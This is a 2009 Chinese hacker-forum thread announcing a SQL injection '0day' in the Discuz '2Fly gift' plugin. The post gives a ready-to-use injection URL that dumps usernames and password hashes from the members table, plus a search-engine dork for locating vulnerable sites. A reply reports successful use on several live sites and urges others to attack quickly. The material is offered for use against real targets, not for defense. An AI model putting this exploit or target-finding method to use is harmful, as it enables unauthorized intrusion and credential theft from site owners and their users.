【3.A.S.T】网络安全爱好者 » 0day发布 » Discuz账号发放插件注入0day

柔肠寸断 发表于 2009-8-14 22:35

Discuz账号发放插件注入0day

Discuz账号发放插件注入0day
插件名:2Fly礼品(序号)发放系统
漏洞文件:2fly_gift.php
版本:最新版
Exp:


http://www.xxx.com/2fly_gift.php?pages=content&gameid=16 and 1=2 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from cdb_members
搜索引擎特征:inurl:2fly_gift.php
上图:
[url=http://huaidan.org/wp-content/uploads/2009/08/200908141228238711.png][img=552,391]http://huaidan.org/wp-content/uploads/2009/08/200908141228238711.png[/img][/url]
[url=http://huaidan.org/wp-content/uploads/2009/08/200908141228366411.png][img=551,390]http://huaidan.org/wp-content/uploads/2009/08/200908141228366411.png[/img][/url]

超超 发表于 2009-8-15 12:29

小柔 无图不真实  图片错误！！！！

学徒 发表于 2009-8-15 15:19

靠了，图片犯盗

cxy_hh 发表于 2009-8-16 23:19

[i=s] 本帖最后由 cxy_hh 于 2009-8-16 23:27 编辑 [/i]

DZ也会有这种漏洞?这些天一个色情联盟的DZ被邪八的人搞了,人家出5W来找邪八的那个人.唉我想搞那个联盟好久了,都没搞成!菜呀!不知他用什么搞的呢,会不会是这个呢?DZ太少暴洞了
试了几个确实是可以的,不过大多数都是报gameid参数错误,百度只找到了1000多个url,要搞的话赶紧的唷,呵呵,要不就被人拿光了,呵呵

查看完整版本: Discuz账号发放插件注入0day